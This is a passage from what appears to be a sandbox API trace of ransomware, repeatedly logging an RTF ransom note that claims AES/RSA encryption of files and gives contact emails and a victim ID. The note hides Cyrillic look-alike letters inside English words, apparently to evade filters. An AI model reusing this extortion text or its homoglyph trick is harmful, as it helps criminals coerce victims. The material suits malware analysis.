\\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2668a38, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 